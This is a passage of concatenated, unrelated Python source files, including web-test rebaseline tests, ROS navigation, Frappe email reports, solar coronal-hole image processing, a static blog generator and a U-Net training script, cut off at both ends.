fast/css/large-list-of-rules-crash.html [ Failure ]\n' )) def test_rebaseline_test(self): # pylint: disable=protected-access actual_result_url = self.WEB_PREFIX + '/userscripts/another-test-actual.txt' self.tool.web.urls[actual_result_url] = b'new result' self.command._rebaseline_test('test-linux-trusty', 'userscripts/another-test.html', 'txt', self.WEB_PREFIX) six.assertCountEqual(self, self.tool.web.urls_fetched, [actual_result_url]) port = self.tool.port_factory.get('test-linux-trusty') self.assertMultiLineEqual( self._read( port.host.filesystem.join( port.baseline_version_dir(), 'userscripts/another-test-expected.txt')), 'new result') def test_rebaseline_test_empty_result(self): # pylint: disable=protected-access actual_result_url = self.WEB_PREFIX + '/userscripts/another-test-actual.txt' self.tool.web.urls[actual_result_url] = b'' self.command._rebaseline_test('test-linux-trusty', 'userscripts/another-test.html', 'txt', self.WEB_PREFIX) six.assertCountEqual(self, self.tool.web.urls_fetched, [actual_result_url]) port = self.tool.port_factory.get('test-linux-trusty') self.assertMultiLineEqual( self._read( port.host.filesystem.join( port.baseline_version_dir(), 'userscripts/another-test-expected.txt')), '') def test_rebaseline_test_non_existence_result(self): # pylint: disable=protected-access actual_result_url = self.WEB_PREFIX + '/userscripts/another-test-actual.txt' self.command._rebaseline_test('test-linux-trusty', 'userscripts/another-test.html', 'txt', self.WEB_PREFIX) six.assertCountEqual(self, self.tool.web.urls_fetched, [actual_result_url]) port = self.tool.port_factory.get('test-linux-trusty') self.assertMultiLineEqual( self._read( port.host.filesystem.join( port.baseline_version_dir(), 'userscripts/another-test-expected.txt')), '') def test_rebaseline_test_with_results_directory(self): # pylint: disable=protected-access self._write('userscripts/another-test.html', 'test data') self._write( self.test_expectations_path, ('Bug(x) [ Mac ] userscripts/another-test.html [ Failure ]\n' 'bug(z) [ Linux ] userscripts/another-test.html [ Failure ]\n')) self.command._rebaseline_test_and_update_expectations( self.options(results_directory='/tmp')) six.assertCountEqual( self, self.tool.web.urls_fetched, ['file:///tmp/userscripts/another-test-actual.txt']) def test_rebaseline_reftest(self): # pylint: disable=protected-access self._write('userscripts/another-test.html', 'test data') self._write('userscripts/another-test-expected.html', 'generic result') OutputCapture().assert_outputs( self, self.command._rebaseline_test_and_update_expectations, args=[self.options(suffixes='png')], expected_logs= 'Cannot rebaseline image result for reftest: userscripts/another-test.html\n' ) self.assertDictEqual(self.command.expectation_line_changes.to_dict(), {'remove-lines': []}) def test_rebaseline_reftest_with_text(self): # pylint: disable=protected-access self._write('userscripts/another-test.html', 'test data') self._write('userscripts/another-test-expected.html', 'generic result') self._write('userscripts/another-test-expected.txt', 'text') OutputCapture().assert_outputs( self, self.command._rebaseline_test_and_update_expectations, args=[self.options(suffixes='png,txt')], expected_logs= 'Cannot rebaseline image result for reftest: userscripts/another-test.html\n' ) six.assertCountEqual( self, self.tool.web.urls_fetched, [self.WEB_PREFIX + '/userscripts/another-test-actual.txt']) self.assertDictEqual(self.command.expectation_line_changes.to_dict(), {'remove-lines': []}) fedecastellaro/create_autonomy #!/usr/bin/env python import math import rospy import actionlib from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal from geometry_msgs.msg import Pose, Quaternion from tf.transformations import quaternion_from_euler from std_msgs.msg import String import send_goals class receive_goals(): def __init__(self): self.new_pose = Pose() self.received_goals = [] rospy.Subscriber("/create1/move_base_goals", String, self.register_goal) self.listen_positions() def register_goal(self, position_goal): self.received_goals.append(position_goal.data) def listen_positions(self): r = rospy.Rate(1) # 1hz while not rospy.is_shutdown(): if self.received_goals: self.move_to_goal(self.received_goals.pop()) send_goals.print_menu() r.sleep() def move_to_goal(self, position_goal): param_path = "/table_positions/" + position_goal param_data = rospy.get_param(param_path, "None") if (param_data == "None"): rospy.logerr("[MOVE] Wrong position received") return rospy.logwarn("[MOVE] Moving to %s", position_goal) self.load_position(param_data['x'], param_data['y'], param_data['angle_raw']) client = actionlib.SimpleActionClient('move_base', MoveBaseAction) client.wait_for_server() goal = MoveBaseGoal() goal.target_pose.header.frame_id = "map" goal.target_pose.header.stamp = rospy.Time.now() goal.target_pose.pose.position.x = self.new_pose.position.x goal.target_pose.pose.position.y = self.new_pose.position.y goal.target_pose.pose.orientation = self.new_pose.orientation client.send_goal(goal) wait = client.wait_for_result() if not wait: rospy.logerr("[MOVE] Action server not available!") #rospy.signal_shutdown("Action server not available!") else: if client.get_result(): rospy.logwarn("[MOVE] Move success") else: rospy.logerr("[MOVE] Move not done") def load_position(self, x, y, angle_raw): q = quaternion_from_euler(0, 0, math.pi * angle_raw / 180) self.new_pose.position.x = x self.new_pose.position.y = y self.new_pose.orientation.x = q[0] self.new_pose.orientation.y = q[1] self.new_pose.orientation.z = q[2] self.new_pose.orientation.w = q[3] if __name__ == '__main__': rospy.init_node('move') receive_goals()from django.test import TestCase from datetime import ( datetime, time ) from gbe_forms_text import ( classbid_labels, class_schedule_options, event_type_options, ) from tests.gbe.test_gbe import TestGBE class TestScheduling(TestGBE): def assert_good_sched_event_form_wizard(self, response, eventitem): assert response.status_code is 200 if eventitem.__class__.__name__ == "Class": for label, detail in [ (classbid_labels['schedule_constraints'], ', '.join( [j for i, j in class_schedule_options if i in eventitem.schedule_constraints])), (classbid_labels['avoided_constraints'], ', '.join( [j for i, j in class_schedule_options if i in eventitem.avoided_constraints])), ('Space Needs', eventitem.get_space_needs_display())]: self.assert_label(response, label, detail) def assert_label(self, response, label, details): selection = '
%s

' % ( label, details ) self.assertContains(response, selection) def assert_event_was_picked_in_wizard(self, response, event_type): checked_button = "" x = 0 for header in event_type_options: y = 0 for subitem in header[1]: if event_type == subitem[0]: checked_button = ( '') % ( event_type, x, y) y += 1 x += 1 self.assertContains( response, '') self.assertContains(response, checked_button, html=True) def assert_role_choice(self, response, role_type): self.assertContains( response, '' % (role_type, role_type), html=True) """Apply Dilation on CH Maps. Last Modified: May 6th, 2021 (Opal) """ import cv2 import numpy as np from chmap.coronal_holes.tracking.src.contour import Contour def get_kernel_width(t, gamma, n_p): """The dilation kernel width based on latitude. Parameters ---------- t: float theta latitude in [0, pi] gamma: int constant param of kernel width at the equator. n_p: int number of pixels in longitude. Returns ------- kernel width: int """ # piecewise function. alpha = np.arcsin(gamma / n_p) # due to symmetry. beta = np.pi - alpha # loop over each interval. if alpha < t < beta: return int(gamma / np.sin(t)) elif 0 <= t <= alpha: return n_p elif beta <= t <= np.pi: return n_p else: raise Exception("latitude value is invalid.") def latitude_weighted_dilation(grey_scale_image, theta, gamma, n_p): """Latitude weighted dilation on EUV Images. TODO: optimize. Parameters ---------- theta: (numpy array) theta coordinate numpy.linspace(0, pi, n_t) gamma: (int) dilation hyper parameter. n_p: (int) number of phi (longitude) pixels. grey_scale_image: (numpy array) grey scaled image or binary image Returns ------- dilated_image: (numpy array) """ # create copy of greyscaled_image dilated_image = np.zeros(grey_scale_image.shape, dtype=np.uint8) # latitude weighted dilation. for ii in range(len(theta)): # build the flat structuring element. width = get_kernel_width(t=theta[ii], gamma=gamma, n_p=n_p) kernel = np.ones(width, dtype=np.uint8) # save dilated strip. dilated_image[ii, :] = np.reshape(cv2.dilate(grey_scale_image[ii, :], kernel, iterations=1), n_p) return dilated_image def uniform_dilation_in_latitude(image, beta=8): """Uniform dilation in latitude - kernel height is the size of "beta" (int). Parameters ---------- beta: (int) structuring element height. Default is 8 pixels (this should change depending on the size of the input image. image: (numpy array) greyscale image. Returns ------- (numpy array) dilated image. """ # initialize the kernel size. kernel = np.ones(beta, dtype=np.uint8) # dilate in latitude. return cv2.dilate(image, kernel=kernel.T, iterations=1) def generate_ch_color(): """generate a random color Returns ------- list of 3 integers between 0 and 255. """ return np.random.randint(low=0, high=255, size=(3,)).tolist() def plot_dilated_contours(contours, Mesh): """Draw filled contours of dilated greyscale input image. Parameters ---------- contours: opencv contours. Mesh: MapMesh object. Returns ------- rbg: image where each contour has a unique color color_list: list of unique contour colors. """ # initialize RBG image. rbg = np.zeros((Mesh.n_t, Mesh.n_p, 3), dtype=np.uint8) # initialize contour color list. color_list = np.zeros((len(contours), 3)) # draw contours on rbg. for ii, contour in enumerate(contours): color_list[ii] = generate_ch_color() cv2.drawContours(image=rbg, contours=[contour], contourIdx=0, color=color_list[ii], thickness=cv2.FILLED) return rbg, color_list.astype(int) def find_contours(image, thresh, Mesh): """Find contours contours of a greyscale dilated image. Parameters ---------- image: (numpy array) gray scaled image. thresh: (float) binary threshold for contours. Mesh: MapMesh object. Returns ------- rbg image list of unique colors. """ # create binary threshold. ret, thresh = cv2.threshold(image, thresh, 1, 0) # find contours using opencv function. contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:] # draw contours. return plot_dilated_contours(contours=contours, Mesh=Mesh) def get_list_of_contours_from_rbg(rbg_image, color_list, Mesh, db_session, map_dir, frame_num=0, frame_timestamp=None): """Save all the image pixel coordinates that are assigned to each coronal hole (along with other coronal hole features- such as area, centroid, etc...). Parameters ---------- Mesh: MeshMap() object with image coordinates. rbg_image: rbg lon-lat classified coronal hole image. color_list: list of contour unique colors. frame_timestamp: frame time stamp, default is None. frame_num: frame id number, default is 0. db_session: database session. map_dir: directory to the saved magnetic data. Returns ------- coronal_hole_list : coronal hole list of Contour object. """ # initialize list of contours. coronal_hole_list = [] # loop over each contour saved. for color in color_list: # save pixel locations. mask = np.all(rbg_image == color, axis=-1) # find image pixel coordinates. contour_pixel = np.asarray(np.where(mask)) # save contour in a list if its not zero. coronal_hole_list.append(Contour(contour_pixels=contour_pixel, frame_num=frame_num, frame_timestamp=frame_timestamp, Mesh=Mesh, db_session=db_session, map_dir=map_dir)) return coronal_hole_list gitter-badger/biolink-model0 """ Generate JSONld """ import os from typing import Union, TextIO, Any, Optional from urllib.parse import urljoin from urllib.request import pathname2url import click from jsonasobj import as_json, loads from metamodel.metamodel import SchemaDefinition, ClassDefinitionName, SlotDefinitionName, TypeDefinitionName, \ ElementName, SlotDefinition, ClassDefinition from metamodel.utils.builtins import builtin_names, builtin_uri, Builtin from metamodel.utils.formatutils import camelcase, underscore from metamodel.utils.generator import Generator from metamodel.utils.yamlutils import YAMLRoot biolink_context = "https://github.com/biolink/biolink-model/raw/master/context.jsonld" meta_context = "https://raw.githubusercontent.com/biolink/biolink-model/master/metamodel/context.jsonld" class JSONLDGenerator(Generator): generatorname = os.path.basename(__file__) generatorversion = "0.0.2" valid_formats = ['jsonld'] def __init__(self, schema: Union[str, TextIO, SchemaDefinition], fmt: str = 'jsonld') -> None: super().__init__(schema, fmt) def _visit(self, node: Any) -> Optional[Any]: if isinstance(node, (YAMLRoot, dict)): if isinstance(node, YAMLRoot): node = node.__dict__ for k, v in list(node.items()): if v: new_v = self._visit(v) if new_v is not None: node[k] = new_v elif isinstance(node, list): for i in range(0, len(node)): new_v = self._visit(node[i]) if new_v is not None: node[i] = new_v elif isinstance(node, set): for v in list(node): new_v = self._visit(v) if new_v is not None: node.remove(v) node.add(new_v) elif isinstance(node, ClassDefinitionName): return ClassDefinitionName(camelcase(node)) elif isinstance(node, SlotDefinitionName): return SlotDefinitionName(underscore(node)) elif isinstance(node, TypeDefinitionName): return TypeDefinitionName(underscore(node)) elif isinstance(node, ElementName): return ClassDefinitionName(camelcase(node)) if node in self.schema.classes else \ SlotDefinitionName(underscore(node)) if node in self.schema.slots else \ TypeDefinitionName(underscore(node)) if node in self.schema.types else \ builtin_uri(str(node)) if str(node) in builtin_names else None elif str(node) in builtin_names: return builtin_uri(str(node)) return None def adjust_slot(self, slot: SlotDefinition) -> None: if slot.range in self.schema.classes: slot.range = ClassDefinitionName(camelcase(slot.range)) elif slot.range in self.schema.slots: slot.range = SlotDefinitionName(underscore(slot.range)) elif slot.range in self.schema.types: slot.range = TypeDefinitionName(underscore(slot.range)) elif slot.range in (Builtin.uri, Builtin.anytype): slot.range = '@id' elif slot.range in builtin_names and builtin_names[slot.range] not in (Builtin.anytype, Builtin.uri): slot.range = builtin_uri(slot.range) def visit_class(self, cls: ClassDefinition) -> bool: self._visit(cls) for slot_usage in cls.slot_usage.values(): self.adjust_slot(slot_usage) return False def visit_slot(self, aliased_slot_name: str, slot: SlotDefinition) -> None: self._visit(slot) self.adjust_slot(slot) def end_schema(self, context: str = biolink_context) -> None: # self._visit(self.schema) json_str = as_json(self.schema) json_obj = loads(json_str) base_prefix = self.default_uri() json_obj["@context"] = [context, {'@base': base_prefix}] if base_prefix else context json_obj["@id"] = self.schema.id print(as_json(json_obj, indent=" ")) @click.command() @click.argument("yamlfile", type=click.Path(exists=True, dir_okay=False)) @click.option("--format", "-f", default='jsonld', type=click.Choice(['jsonld']), help="Output format") @click.option("--context", default=biolink_context, help="JSONLD context file (default: biolink context.jsonld)") def cli(yamlfile, format, context): """ Generate JSONLD file from biolink schema """ print(JSONLDGenerator(yamlfile, format).serialize(context=context)) 0 # -*- coding: utf-8 -*- # Copyright (c) 2015, Frappe Technologies and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe, json from frappe import _ from frappe.model.document import Document from datetime import timedelta import frappe.utils from frappe.utils import now, global_date_format, format_time from frappe.utils.xlsxutils import make_xlsx from frappe.utils.csvutils import to_csv max_reports_per_user = 3 class AutoEmailReport(Document): def autoname(self): self.name = _(self.report) def validate(self): # self.validate_report_count() self.validate_emails() self.validate_report_format() def validate_emails(self): '''Cleanup list of emails''' if ',' in self.email_to: self.email_to.replace(',', '\n') valid = [] for email in self.email_to.split(): if email: frappe.utils.validate_email_add(email, True) valid.append(email) self.email_to = '\n'.join(valid) def validate_report_count(self): '''check that there are only 3 enabled reports per user''' count = frappe.db.sql('select count(*) from `tabAuto Email Report` where user=%s and enabled=1', self.user)[0][0] if count > max_reports_per_user + (-1 if self.flags.in_insert else 0): frappe.throw(_('Only {0} emailed reports are allowed per user').format(max_reports_per_user)) def validate_report_format(self): """ check if user has select correct report format """ valid_report_formats = ["HTML", "XLSX", "CSV"] if self.format not in valid_report_formats: frappe.throw(_("%s is not a valid report format. Report format should \ one of the following %s"%(frappe.bold(self.format), frappe.bold(", ".join(valid_report_formats))))) def get_report_content(self): '''Returns file in for the report in given format''' report = frappe.get_doc('Report', self.report) if self.report_type=='Report Builder' and self.data_modified_till: self.filters = json.loads(self.filters) if self.filters else {} self.filters['modified'] = ('>', frappe.utils.now_datetime() - timedelta(hours=self.data_modified_till)) columns, data = report.get_data(limit=self.no_of_rows or 100, user = self.user, filters = self.filters, as_dict=True) # add serial numbers columns.insert(0, frappe._dict(fieldname='idx', label='', width='30px')) for i in range(len(data)): data[i]['idx'] = i+1 if len(data)==0 and self.send_if_data: return None if self.format == 'HTML': return self.get_html_table(columns, data) elif self.format == 'XLSX': spreadsheet_data = self.get_spreadsheet_data(columns, data) xlsx_file = make_xlsx(spreadsheet_data, "Auto Email Report") return xlsx_file.getvalue() elif self.format == 'CSV': spreadsheet_data = self.get_spreadsheet_data(columns, data) return to_csv(spreadsheet_data) else: frappe.throw(_('Invalid Output Format')) def get_html_table(self, columns=None, data=None): date_time = global_date_format(now()) + ' ' + format_time(now()) report_doctype = frappe.db.get_value('Report', self.report, 'ref_doctype') return frappe.render_template('frappe/templates/emails/auto_email_report.html', { 'title': self.name, 'description': self.description, 'date_time': date_time, 'columns': columns, 'data': data, 'report_url': frappe.utils.get_url_to_report(self.report, self.report_type, report_doctype), 'report_name': self.report, 'edit_report_settings': frappe.utils.get_link_to_form('Auto Email Report', self.name) }) @staticmethod def get_spreadsheet_data(columns, data): out = [[_(df.label) for df in columns], ] for row in data: new_row = [] out.append(new_row) for df in columns: new_row.append(frappe.format(row[df.fieldname], df, row)) return out def get_file_name(self): return "{0}.{1}".format(self.report.replace(" ", "-").replace("/", "-"), self.format.lower()) def send(self): if self.filter_meta and not self.filters: frappe.throw(_("Please set filters value in Report Filter table.")) data = self.get_report_content() if not data: return attachments = None if self.format == "HTML": message = data else: message = self.get_html_table() if not self.format=='HTML': attachments = [{ 'fname': self.get_file_name(), 'fcontent': data }] frappe.sendmail( recipients = self.email_to.split(), subject = self.name, message = message, attachments = attachments ) @frappe.whitelist() def download(name): '''Download report locally''' auto_email_report = frappe.get_doc('Auto Email Report', name) auto_email_report.check_permission() data = auto_email_report.get_report_content() if not data: frappe.msgprint(_('No Data')) return frappe.local.response.filecontent = data frappe.local.response.type = "download" frappe.local.response.filename = auto_email_report.get_file_name() @frappe.whitelist() def send_now(name): '''Send Auto Email report now''' auto_email_report = frappe.get_doc('Auto Email Report', name) auto_email_report.check_permission() auto_email_report.send() def send_daily(): '''Check reports to be sent daily''' now = frappe.utils.now_datetime() for report in frappe.get_all('Auto Email Report', {'enabled': 1, 'frequency': ('in', ('Daily', 'Weekly'))}): auto_email_report = frappe.get_doc('Auto Email Report', report.name) # if not correct weekday, skip if auto_email_report.frequency=='Weekly': if now.weekday()!={'Monday':0,'Tuesday':1,'Wednesday':2, 'Thursday':3,'Friday':4,'Saturday':5,'Sunday':6}[auto_email_report.day_of_week]: continue auto_email_report.send() def send_monthly(): '''Check reports to be sent monthly''' for report in frappe.get_all('Auto Email Report', {'enabled': 1, 'frequency': 'Monthly'}): frappe.get_doc('Auto Email Report', report.name).send() # -*- coding: utf-8 -*- import os.path import mfr from mfr import config as core_config, RenderResult from mfr.core import get_assets_from_list from IPython.nbformat import current as nbformat from IPython.config import Config from IPython.nbconvert.exporters import HTMLExporter HERE = os.path.dirname(os.path.abspath(__file__)) TEMPLATE = os.path.join(HERE, 'templates', 'ipynb.html') # TODO These come from nb viewer, but conflict with the page. CSS_ASSETS = [ "pygments.css", # "style.min.css", # "theme/cdp_1.css", # "theme/css_linalg.css", ] c = Config() c.HTMLExporter.template_file = 'basic' c.NbconvertApp.fileext = 'html' c.CSSHTMLHeaderTransformer.enabled = False # don't strip the files prefix c.Exporter.filters = {'strip_files_prefix': lambda s: s} exporter = HTMLExporter(config=c) def render_html(file_pointer, **kwargs): try: content = file_pointer.read() nb = nbformat.reads_json(content) except ValueError: return RenderResult("Invalid json") # name, theme = get_metadata(nb) body = exporter.from_notebook_node(nb)[0] with open(TEMPLATE) as template: content = template.read().format( body=body, ) assets_uri_base = '{0}/mfr_ipynb'.format(mfr.config['STATIC_URL']) assets = { 'css': get_assets_from_list(assets_uri_base, 'css', CSS_ASSETS) } return RenderResult(content, assets) # Metadata not currently used # def get_metadata(nb): # # notebook title # name = nb.get('metadata', {}).get('name', None) or "untitiled.ipynb" # if not name.endswith(".ipynb"): # name += ".ipynb" # css_theme = nb.get('metadata', {})\ # .get('_nbviewer', {})\ # .get('css', None) # if css_theme and not re.match('\w', css_theme): # css_theme = None # return name, css_theme def get_stylesheets(*args): return [os.path.join(core_config['STATIC_URL'], path) for path in args] 0 # arranjos ou vetores, ou arrays são os mesmos def EncontrarElementosDuplicados(lista, m): # se a lista = vazia returna zero if not lista: return[] tabelaDeFrequncia = [0] * m duplicadas = [] for i in range(len(lista)): for ii in range(i + 1, len(lista)): if lista[i] == lista[ii]: duplicadas.append(lista[ii]) return duplicadas print(f'elementos duplicados:') elementos = EncontrarElementosDuplicados([1,2,1,1,1,1,2,2,3,4,8,8,9,5,7,5,6,90,99,99,99,10,54,55,55,41,63,45,69,74], 99) for elemento in elementos: print(f'{elemento} ', end='') print()# coding: utf-8 from . import utils def backup(archive): utils.archive_dirs(archive, "/etc/puppet", "puppet") def restore(archive): utils.extract_tag_to(archive, "puppet", "/etc/puppet") pythonPackages/pypies/testCustomJavaDeserialization.py import dynamicserialize from dynamicserialize.dstypes.java.awt import Point from dynamicserialize.dstypes.com.raytheon.uf.common.pypies import PointTest def readObject(): f = open('/tmp/javaPoints') data = f.read() f.close() return data def writeObject(): data = PointTest() p1 = Point() p1.setX(26) p1.setY(9) p2 = Point() p2.setX(144) p2.setY(-7) points = [p1, p2] data.setPoints(points) bytes = dynamicserialize.serialize(data) f = open('/tmp/pythonPoints', 'w') f.write(bytes) f.close() print "wrote to /tmp/pythonPoints" def main(): data = readObject() obj = dynamicserialize.deserialize(data) print obj print obj.getPoints() writeObject() if __name__ == '__main__': main()import os import sys import json import argparse import shutil from datetime import datetime import logging try: # import for python2.7 from SimpleHTTPServer import SimpleHTTPRequestHandler from BaseHTTPServer import HTTPServer except ImportError: # import for python3 from http.server import SimpleHTTPRequestHandler from http.server import HTTPServer from .page_generator import PageGenerator log = logging.getLogger(__name__) class BlogAction: def __init__(self, config): self.config = config def serve(self): """ Run web-server to test static site """ os.chdir(self.config["render_dir"]) server_addr = ('localhost', 8000) request_handler = SimpleHTTPRequestHandler httpd = HTTPServer(server_addr, request_handler) log.info("Serving at http://{0}:{1}".format(*server_addr)) httpd.serve_forever() def build(self): """ Generate finalized html. Also fill metadata for new drafts """ page_generator = PageGenerator(self.config) page_generator.generate_all() def post(self, slug, draft_type): """ Make a new page draft with given slug """ now = datetime.now() draft_path = os.path.join(self.config['pages_dir'], now.strftime("%Y-%m-%d__") + slug + '.md') date_time = now.strftime(self.config['date_format']) with open(draft_path, 'w') as f: f.write(self.config['draft_templates'][draft_type]['content'] .format(slug=slug, date_time=date_time)) log.info(draft_path) def create_blog(blog_dir): blog_path = os.path.join(os.getcwd(), blog_dir, '_blog') pages_path = os.path.join(blog_path, 'pages') os.makedirs(pages_path) engine_path = os.path.dirname(os.path.realpath(__file__)) shutil.copytree(os.path.join(engine_path, 'templates'), os.path.join(blog_path, 'templates')) shutil.copyfile( os.path.join(engine_path, 'default.json'), os.path.join(blog_path, 'default.json')) shutil.copyfile( os.path.join(engine_path, 'draft_templates.json'), os.path.join(blog_path, 'draft_templates.json')) log.info("Blog created. \ncd {0} && blo post hello-worlds".format(blog_dir)) def parse_args(): """ How to use blog: - build -- generate htmls in 'render_dir' - serve -- run webserver for testing in 'render_dir' - post "slug" -- greate new page with given title """ parser = argparse.ArgumentParser() parser.add_argument('action', nargs='+') parser.add_argument('--config', default='default.json') parser.add_argument('--type', default='post') return parser.parse_args() def main(): opts = parse_args() if opts.action[0] == 'create': if len(opts.action) == 1: log.info("Add blog folder name") return 1 # try: # for python2.7 blog_dir = unicode(opts.action[1], 'utf-8') except NameError: # for python3 blog_dir = opts.action[1] create_blog(blog_dir) return 0 config_path = os.path.join(os.getcwd(), '_blog', opts.config) config = json.load(open(config_path)) draft_templates_path = os.path.join(os.getcwd(), '_blog', 'draft_templates.json') config['draft_templates'] = json.load(open(draft_templates_path)) blog_action = BlogAction(config) if opts.action[0] == 'build': blog_action.build() if opts.action[0] == 'serve': blog_action.serve() elif opts.action[0] == 'post': try: # for python2.7 slug = unicode(opts.action[1], 'utf-8') except NameError: # for python3 slug = opts.action[1] blog_action.post(slug, opts.type) if __name__ == "__main__": log.addHandler(logging.StreamHandler(sys.stdout)) log.setLevel(logging.DEBUG) sys.exit(main())python_common/gui_tkinter/text_editor_ui.py0 from tkinter import * from tkinter import filedialog as fd textString = "" root = Tk() root.title("my editor") frame = Frame(root) frame.pack() scrollbar = Scrollbar(root) scrollbar.pack(side=RIGHT, fill=Y) text = Text(root, yscrollcommand=scrollbar.set) text.pack(side=BOTTOM) filename = "" def read_text(): global filename filename = fd.askopenfilename() print("read file:" + filename) if filename != "": with open(filename, encoding='gbk') as f: text_string = f.read() text.delete('1.0', END) text.insert(INSERT, text_string) text.insert(END, "") def save_text(): global filename print("save file as:" + filename) write_text = text.get('1.0', END) if filename != "": with open(filename, 'w', encoding='gbk') as f: f.write(str(write_text)) open_button = Button(frame, text="open", command=read_text) open_button.pack(side=LEFT) save_button = Button(frame, text="save", command=save_text) save_button.pack(side=LEFT) root.mainloop() #!/usr/bin/python # Adapted from code in the below URL: # https://github.com/petuum/public/blob/release_0.93/apps/matrixfact/sampledata/make_synth_data.py import sys, random if len(sys.argv) <> 4: print 'Creates sparse, block-diagonal synthetic data to test the Petuum NMF application' print '' print 'Usage: python %s ' % sys.argv[0] print '' print 'Creates a block-diagonal matrix, where each diagonal block has width and height' print '; is the total number of diagonal blocks. The upper left block' print 'is set to 1, and the i-th diagonal block is set to i. All blocks are output to .' print '' print 'When is input to Petuum NMF with rank = , the resulting L,R' print 'factors should be clearly split into groups of rows each.' print 'Thus, one may use this script to test Petuum NMF on arbitrarily-sized data. Note that the NMF' print 'initial step size will have be tuned to each new matrix, to prevent algorithm divergence.' print '' print 'Example:' print 'python %s 3 3 test-matrix' % sys.argv[0] print 'This creates a 9-by-9 matrix with 3 diagonal blocks of width 3, and outputs it to test-matrix.' sys.exit(1) block_width = int(sys.argv[1]) num_diag_blocks = int(sys.argv[2]) output_file = sys.argv[3] N = block_width * num_diag_blocks with open(output_file,'w') as g: row_entries = {} for b in range(num_diag_blocks): for subrow in range(block_width): row_idx = subrow + b*block_width # Generate block diagonal for j in range(b*block_width,(b+1)*block_width): if not row_idx in row_entries: row_entries[row_idx] = {} row_entries[row_idx][j] = b+1 # Print entries for i in range(num_diag_blocks*block_width): for j in range(num_diag_blocks*block_width): if not j in row_entries[i]: ele = 0 else: ele = row_entries[i][j] g.write('%d\t' % (ele)) g.write('\n')import pandas as pd import requests import io import numpy as np import geoglows #df = pd.read_csv('/Users/student/Dropbox/PhD/2020_Winter/Dissertation_v9/South_America/Colombia/IDEAM_Stations_v2.csv') df = pd.read_csv('C:\\Users\\jsanch3z\\Dropbox\\PhD\\2020_Winter\\Dissertation_v9\\South_America\\Colombia\\Stations_Selected_Colombia_v3.csv') IDs = df['Codigo'].tolist() #COMIDs = df['COMID'].tolist() COMIDs = df['new_COMID'].tolist() Names = df['Nombre'].tolist() Rivers = df['Corriente'].tolist() # #data = pd.read_csv('/Users/student/Dropbox/PhD/2020 Winter/Dissertation_v9/South_America/Colombia/row_data/Excel_2021_06_03.csv') # data = pd.read_csv('C:\\Users\\jsanch3z\\Dropbox\\PhD\\2020_Winter\\Dissertation_v9\\South_America\\Colombia\\row_data\\Excel_2021_06_03.csv') # data.rename(columns={'Fecha': 'Datetime'}, inplace=True) # data.set_index(['Datetime'], inplace=True, drop=True) # data.index = pd.to_datetime(data.index) # # for id in IDs: # # print(id) # station_data = data.loc[data['CodigoEstacion'] == id] # station_data = station_data.drop(['CodigoEstacion', 'NombreEstacion', 'Latitud', 'Longitud', 'Altitud'], axis=1) # station_data.rename(columns={'Valor': 'Streamflow (m3/s)'}, inplace=True) # # index = pd.date_range(station_data.index[0], station_data.index[len(station_data.index) - 1], freq='D') # data_nan = [np.nan] * len(index) # pairs = [list(a) for a in zip(index, data_nan)] # df2 = pd.DataFrame(pairs, columns=['Datetime', 'Values']) # df2.set_index(['Datetime'], inplace=True, drop=True) # # result = pd.concat([df2, station_data], axis=1, sort=False) # result = result.drop(['Values'], axis=1) # # #result.to_csv("/Users/student/Github/Bias_Correction/Colombia/Updated/{0}.csv".format(id)) # result.to_csv("C:\\Users\\jsanch3z\\Dropbox\\PhD\\2020_Winter\\Dissertation_v9\\South_America\\Colombia\\Forecast\\Observed_Data\\Streamflow\\{0}.csv".format(id)) # # print('Terminado con los observados') for comid in COMIDs: print(comid) url = 'https://geoglows.ecmwf.int/api/HistoricSimulation/?reach_id={0}&return_format=csv'.format(comid) s = requests.get(url, verify=False).content simulated_df = pd.read_csv(io.StringIO(s.decode('utf-8')), index_col=0) #simulated_df = geoglows.streamflow.historic_simulation(comid, forcing='era_5', return_format='csv') simulated_df[simulated_df < 0] = 0 simulated_df.index = pd.to_datetime(simulated_df.index) simulated_df.index = simulated_df.index.to_series().dt.strftime("%Y-%m-%d") simulated_df.index = pd.to_datetime(simulated_df.index) simulated_df.to_csv("C:\\Users\\jsanch3z\\Dropbox\\PhD\\2020_Winter\\Dissertation_v9\\South_America\\Colombia\\Historical\\Simulated_Data\\ERA_5\\{0}.csv".format(comid)) print('Terminado con los simulados') from model import * from data import * #os.environ["CUDA_VISIBLE_DEVICES"] = "0" from PIL import Image from resizeimage import resizeimage from skimage import color from skimage import io import cv2 from matplotlib import pyplot as plt import numpy as np import glob from array import array import statistics from splitter import * for filename in glob.glob('data/membrane/train/label/*.png'): #assuming gif #cover.save(filename, im.format) im = cv2.imread(filename) ret,thresh1 = cv2.threshold(im,127,255,cv2.THRESH_BINARY) cv2.imwrite(filename, thresh1) for filename in glob.glob('data/membrane/train/image/*.png'): #assuming gif #cover.save(filename, im.format) im = cv2.imread(filename,0) im = cv2.equalizeHist(im) cv2.imwrite(filename, im) for filename in glob.glob('data/membrane/test/*.png'): #assuming gif #cover.save(filename, im.format) im = cv2.imread(filename,0) im = cv2.equalizeHist(im) cv2.imwrite(filename, im) """upper is for contrast enhancement of images""" data_gen_args = dict(rotation_range=0.6, width_shift_range=0.07, height_shift_range=0.07, shear_range=0.09, zoom_range=0.07, horizontal_flip=True, fill_mode='nearest') target_size=(1024,1024) myGene = trainGenerator(1,'data/membrane/train','image','label',data_gen_args,save_to_dir = 'data/membrane/train/aug',target_size=target_size) model = unet() model_checkpoint = ModelCheckpoint('unet_membrane.hdf5', monitor='loss',verbose=1, save_best_only=True) model.fit_generator(myGene,steps_per_epoch=10000,epochs=4 ,callbacks=[model_checkpoint]) #predict using stored model model.load_weights("unet_membrane.hdf5") testGene = testGenerator("data/membrane/test",target_size=target_size) results = model.predict_generator(testGene,23,verbose=1) saveResult("data/membrane/test",results) #black and white all predicted values for filename in glob.glob('data/membrane/test/*_predict.png'): #assuming gif #cover.save(filename, im.format) im = cv2.imread(filename) ret,thresh1 = cv2.threshold(im,127,255,cv2.THRESH_BINARY) cv2.imwrite(filename, thresh1) #measure lenght of path image path="data/membrane/test/6" left=array("i") right=array("i") image_in=cv2.imread(path+"_predict.png") image_in=cv2.cvtColor(image_in,cv2.COLOR_BGR2GRAY) cv2.imshow('image',image_in) cv2.waitKey(0) cv2.destroyWindow('image') for i in range(image_in.shape[0]): counter=0 counter2=0 for j in range(image_in.shape[1]): if image_in[i,j] < 100: if 